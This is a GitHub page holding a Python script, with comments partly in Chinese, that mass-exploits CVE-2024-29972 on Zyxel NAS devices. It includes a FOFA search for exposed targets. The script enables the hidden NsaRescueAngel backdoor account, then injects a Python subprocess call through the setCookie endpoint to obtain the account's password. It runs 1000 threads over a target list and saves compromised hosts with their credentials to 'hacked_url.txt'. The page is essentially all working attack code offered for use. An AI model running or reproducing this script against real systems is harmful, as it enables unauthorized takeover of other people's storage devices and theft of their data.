-
Notifications
You must be signed in to change notification settings - Fork 2
/
CVE-2024-29972.py
83 lines (71 loc) · 2.58 KB
/
CVE-2024-29972.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#CVE-2024-29972 Zyxel Nas Backdoor Account 后门账户未授权开启
#FOFA app="ZyXEL-NAS326"
# TG https://t.me/WanLiChangChengWanLiChang
import requests
import json
import queue
import threading
import urllib3
from requests.packages.urllib3.exceptions import InsecureRequestWarning
urllib3.disable_warnings(InsecureRequestWarning)
NsaRescueAngel = "NsaRescueAngel"
output_file = "hacked_url.txt"
def step1(url):
try:
response = requests.get(url + "/desktop,/cgi-bin/remote_help-cgi/favicon.ico?type=sshd_tdc", verify=False, timeout=10)
if response.status_code == 200 and "result=0" in response.text:
return True
except Exception as e:
print(f"后门用户检测失败:{url}")
return False
def step2(url):
try:
post_url = url + "/cmd,/simZysh/register_main/setCookie"
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
}
data = 'c0=storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("makekey", shell=True)#'
response = requests.post(post_url, headers=headers, data=data, verify=False, timeout=10)
if response.status_code == 200:
result = response.json()
if "errno0" in result and result["errno0"] == 0 and "errmsg0" in result and result["errmsg0"] == "OK":
password = result["zyshdata0"][0].strip()
print(f"[+]Inject Well : {url}:{NsaRescueAngel}:{password}")
write_to_file(f"{url}:{NsaRescueAngel}:{password}")
return True
except Exception as e:
print(f"获取密码失败:{url}")
return False
def write_to_file(content):
with open(output_file, 'a') as f:
f.write(content + "\n")
def worker(queue):
while True:
url = queue.get()
if url is None:
break
if step1(url):
if step2(url):
pass
queue.task_done()
if __name__ == "__main__":
queue = queue.Queue()
with open("zyxelnas.txt", "r") as file:
attackips = file.readlines()
for i in attackips:
url = i.strip()
if not url.startswith("http"):
url = "http://" + url
queue.put(url)
threads_count = 1000
threads = []
for _ in range(threads_count):
t = threading.Thread(target=worker, args=(queue,))
t.start()
threads.append(t)
queue.join()
for _ in range(threads_count):
queue.put(None)
for t in threads:
t.join()
print("批量扫描完成,结果已写入到", output_file)